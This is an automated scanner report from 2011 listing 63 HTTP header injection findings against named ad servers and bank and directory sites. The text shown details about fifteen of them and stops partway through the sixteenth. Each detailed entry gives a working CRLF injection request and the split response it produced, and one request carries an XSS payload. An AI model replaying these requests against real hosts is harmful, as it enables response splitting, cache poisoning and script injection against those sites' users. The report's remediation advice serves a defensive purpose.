HTTP Header Injection, DORK, HTTP Response Splitting, CWE-113

HTTP Header Injection in Various Hosts | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:37:09 CST 2011.



DORK CWE-79 XSS Report

Loading

1. HTTP header injection

1.1. http://102.xg4ken.com/media/redir.php [client parameter]

1.2. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

1.3. http://18.xg4ken.com/media/redir.php [url[] parameter]

1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

1.5. http://ad.doubleclick.net/ad/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

1.6. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.12 [REST URL parameter 1]

1.7. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

1.8. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

1.9. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.15 [REST URL parameter 1]

1.10. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

1.11. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

1.12. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

1.13. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

1.14. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

1.15. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

1.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [REST URL parameter 1]

1.17. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

1.18. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [REST URL parameter 1]

1.19. http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage [REST URL parameter 1]

1.20. http://ad.doubleclick.net/adj/N3285.google/B2343920.135 [REST URL parameter 1]

1.21. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

1.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [REST URL parameter 1]

1.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [REST URL parameter 1]

1.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [REST URL parameter 1]

1.25. http://ad.doubleclick.net/adj/accuwx.us.radarandmaps/satellite [REST URL parameter 1]

1.26. http://ad.doubleclick.net/adj/locm.pp [REST URL parameter 1]

1.27. http://ad.doubleclick.net/adj/locm.sp [REST URL parameter 1]

1.28. http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100 [REST URL parameter 1]

1.29. http://ad.doubleclick.net/adj/ocr.sant.ocregister/homepage [REST URL parameter 1]

1.30. http://ad.doubleclick.net/jump/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

1.31. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

1.32. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

1.33. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

1.34. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

1.35. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

1.36. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

1.37. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.72 [REST URL parameter 1]

1.38. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

1.39. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

1.40. http://ad.doubleclick.net/jump/locm.pp [REST URL parameter 1]

1.41. http://ad.doubleclick.net/jump/locm.sp [REST URL parameter 1]

1.42. http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100 [REST URL parameter 1]

1.43. https://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

1.44. https://ad.doubleclick.net/activity [src parameter]

1.45. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

1.46. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

1.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

1.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

1.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

1.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

1.51. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

1.52. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

1.53. https://customercare.suntrust.com/guides/bus_services.asp [REST URL parameter 1]

1.54. https://customercare.suntrust.com/guides/contact_us.asp [REST URL parameter 1]

1.55. https://customercare.suntrust.com/guides/credit_cards.asp [REST URL parameter 1]

1.56. https://customercare.suntrust.com/guides/deposits.asp [REST URL parameter 1]

1.57. https://customercare.suntrust.com/guides/marine_lending.asp [REST URL parameter 1]

1.58. https://customercare.suntrust.com/guides/merchant_services.asp [REST URL parameter 1]

1.59. https://customercare.suntrust.com/guides/mort_services.asp [REST URL parameter 1]

1.60. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

1.61. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

1.62. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

1.63. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]



1. HTTP header injection
There are 63 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://102.xg4ken.com/media/redir.php [client parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the client request parameter is copied into the Location response header. The payload 6ab39%0d%0add2c0783ef6 was submitted in the client parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=93&camp=4969&affcode=cr20710&cid=7766893513|171567|bank%20accounts&mType=&networkType=content&url[]=https%3A%2F%2Fwww.readydebit.com%2Fprepaid%2Fselect.html%3Fmid%3D160%26pvid5%3Dmmerollout&client=6ab39%0d%0add2c0783ef6 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 15:42:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=3025018b-a68d-7e28-52f3-0000488919cd; expires=Wed, 04-May-2011 15:42:13 GMT; path=/; domain=.xg4ken.com
Location: https://www.readydebit.com/prepaid/select.html?mid=160&pvid5=mmerollout&client=6ab39
dd2c0783ef6

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.2. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 5795c%0d%0a925eb9a0928 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=93&camp=4969&affcode=cr20710&cid=7766893513|171567|bank%20accounts&mType=&networkType=content&url[]=https%3A%2F%2Fwww.readydebit.com%2Fprepaid%2Fselect.html%3Fmid%3D160%26pvid5%3Dmmerollout&client=ca-dp-r-mark03_3ph_js&5795c%0d%0a925eb9a0928=1 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 15:42:13 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=7f8fec1e-1ba4-58c9-eb89-000044f59568; expires=Wed, 04-May-2011 15:42:13 GMT; path=/; domain=.xg4ken.com
Location: https://www.readydebit.com/prepaid/select.html?mid=160&pvid5=mmerollout&client=ca-dp-r-mark03_3ph_js&5795c
925eb9a0928
=1
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.3. http://18.xg4ken.com/media/redir.php [url[] parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://18.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is copied into the Location response header. The payload 3dc4e%0d%0a8b43bea0858 was submitted in the url[] parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=134&camp=8291&affcode=kw41499&inhURL=&cid=167204850&mType=e&queryStr=online%20banking&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549059%3B49327498%3Ba%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc1308423dc4e%0d%0a8b43bea0858&defurl=http://18.xg4ken.com/media/redir.php?prof=134&camp=8291&affcode=cr41483&cid=167204850&mType=e&queryStr=online%20banking&url[]=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B225549059%3B49327498%3Ba%3Fhttps:%2F%2Fwww.ally.com%2Findex.html%3FCP%3Dppc130842 HTTP/1.1
Host: 18.xg4ken.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 13:42:58 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=37147d0d-185e-3a48-2b93-000033904a2f; expires=Wed, 04-May-2011 13:42:58 GMT; path=/; domain=.xg4ken.com
Location: http://ad.doubleclick.net/clk;225549059;49327498;a?https://www.ally.com/index.html?CP=ppc1308423dc4e
8b43bea0858

P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.4. http://ad.br.doubleclick.net/getcamphist [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.br.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 17340%0d%0a79c188add23 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1508997;host=metric.superpages.com%2Fb%2Fss%2Fsuperpagescom%2F1%2FH.22.1%2Fs93842685804702%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D3%252F1%252F2011%252010%253A37%253A58%25204%2520360%26ns%3Dsuperpages%26pageName%3DMaps%26g%3Dhttp%253A%252F%252Fmapserver.superpages.com%252Fmapbasedsearch%252F%253F%2526SRC%253Dcomlocal1ae0186%252522%25253balert%281%29%252F%252F4a2e6a0ce5b%2526C%253Dbanks%2526L%253D19101%2526CS%253DL%2526MCBP%253Dtrue%2526C%253DBanks%2526STYPE%253DS%2526PS%253D15%2526search%253DFind%252BIt%26r%3Dhttp%253A%252F%252Fburp%252Fshow%252F51%26cc%3DUSD%26vvp%3DDFA%25231508997%253Av25%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3DMaps%26v0%3Dcomlocal1ae0186%2522%253Balert%281%29%252F%252F4a2e6a0ce5b%26events%3Devent1%26v2%3DMaps%26v3%3DMaps%26v6%3DLess%2520than%25201%2520day%26c13%3DLess%2520than%25201%2520day%26c15%3D10%253A30AM%26c16%3DThursday%26c17%3DWeekday%26c18%3DError%2520Page%2520Try%2520Again%26c20%3D100%26v21%3DNon-registered%2520user%26v22%3DEnglish%26c34%3Dcomlocal1ae0186%2522%253Balert%281%29%252F%252F4a2e6a0ce5b%26v40%3D10%253A30AM%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1037%26bh%3D1012%26p%3DChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.230.5%253BJava%28TM%29%2520Platform%2520SE%25206%2520U23%253BWPI%2520Detector%25201.1%253BGoogle%2520Update%253BSilverlight%2520Plug-In%253BDefault%2520Plug-in%253B%26AQE%3D117340%0d%0a79c188add23&A2S=1;ord=1582166923 HTTP/1.1
Host: ad.br.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mapserver.superpages.com/mapbasedsearch/?&SRC=comlocal1ae0186%22%3balert(1)//4a2e6a0ce5b&C=banks&L=19101&CS=L&MCBP=true&C=Banks&STYPE=S&PS=15&search=Find+It
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.0 302 Moved Temporarily
Content-Length: 0
Location: http://metric.superpages.com/b/ss/superpagescom/1/H.22.1/s93842685804702?AQB=1&vvpr=true&&ndh=1&t=3%2F1%2F2011%2010%3A37%3A58%204%20360&ns=superpages&pageName=Maps&g=http%3A%2F%2Fmapserver.superpages.com%2Fmapbasedsearch%2F%3F%26SRC%3Dcomlocal1ae0186%2522%253balert(1)%2F%2F4a2e6a0ce5b%26C%3Dbanks%26L%3D19101%26CS%3DL%26MCBP%3Dtrue%26C%3DBanks%26STYPE%3DS%26PS%3D15%26search%3DFind%2BIt&r=http%3A%2F%2Fburp%2Fshow%2F51&cc=USD&vvp=DFA%231508997%3Av25%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=Maps&v0=comlocal1ae0186%22%3Balert(1)%2F%2F4a2e6a0ce5b&events=event1&v2=Maps&v3=Maps&v6=Less%20than%201%20day&c13=Less%20than%201%20day&c15=10%3A30AM&c16=Thursday&c17=Weekday&c18=Error%20Page%20Try%20Again&c20=100&v21=Non-registered%20user&v22=English&c34=comlocal1ae0186%22%3Balert(1)%2F%2F4a2e6a0ce5b&v40=10%3A30AM&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1037&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava(TM)%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=117340
79c188add23
&A2S=1/respcamphist;src=1508997;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296759132


1.5. http://ad.doubleclick.net/ad/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3867.605.ACCUWEATHER/B5097428.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6fceb%0d%0a0ed31c09936 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6fceb%0d%0a0ed31c09936/N3867.605.ACCUWEATHER/B5097428.13 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6fceb
0ed31c09936
/N3867.605.ACCUWEATHER/B5097428.13:
Date: Thu, 03 Feb 2011 19:03:56 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.12 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.12

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 75094%0d%0a54bf7bd2017 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /75094%0d%0a54bf7bd2017/N884.AccuWeather/B4902356.12 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/75094
54bf7bd2017
/N884.AccuWeather/B4902356.12:
Date: Thu, 03 Feb 2011 19:03:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.13 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 735ad%0d%0a719906bbad3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /735ad%0d%0a719906bbad3/N884.AccuWeather/B4902356.13;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/735ad
719906bbad3
/N884.AccuWeather/B4902356.13%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:49 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.14 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.14

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a187%0d%0ad171e8daa80 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a187%0d%0ad171e8daa80/N884.AccuWeather/B4902356.14 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a187
d171e8daa80
/N884.AccuWeather/B4902356.14:
Date: Thu, 03 Feb 2011 19:03:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.9. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.15 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.15

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93dd3%0d%0afa925ac47eb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93dd3%0d%0afa925ac47eb/N884.AccuWeather/B4902356.15 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93dd3
fa925ac47eb
/N884.AccuWeather/B4902356.15:
Date: Thu, 03 Feb 2011 19:03:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.10. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9863d%0d%0a65dd4847a9a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9863d%0d%0a65dd4847a9a/N884.AccuWeather/B4902356.6;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9863d
65dd4847a9a
/N884.AccuWeather/B4902356.6%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.11. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.67 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.67

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c2b0%0d%0aeac9dd2feb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c2b0%0d%0aeac9dd2feb/N884.AccuWeather/B4902356.67 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c2b0
eac9dd2feb
/N884.AccuWeather/B4902356.67:
Date: Thu, 03 Feb 2011 19:03:55 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76332%0d%0a35da929143b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /76332%0d%0a35da929143b/N884.AccuWeather/B4902356.7 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/76332
35da929143b
/N884.AccuWeather/B4902356.7:
Date: Thu, 03 Feb 2011 19:03:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.13. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.71 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.71

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b019%0d%0a08096ae334b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b019%0d%0a08096ae334b/N884.AccuWeather/B4902356.71;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b019
08096ae334b
/N884.AccuWeather/B4902356.71%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.14. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.73 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.73

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 26b83%0d%0a06496caf30a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /26b83%0d%0a06496caf30a/N884.AccuWeather/B4902356.73;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/26b83
06496caf30a
/N884.AccuWeather/B4902356.73%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.15. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.74 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N884.AccuWeather/B4902356.74

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 10128%0d%0a21b85e9ff66 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /10128%0d%0a21b85e9ff66/N884.AccuWeather/B4902356.74;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/10128
21b85e9ff66
/N884.AccuWeather/B4902356.74%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.135

Issue detail

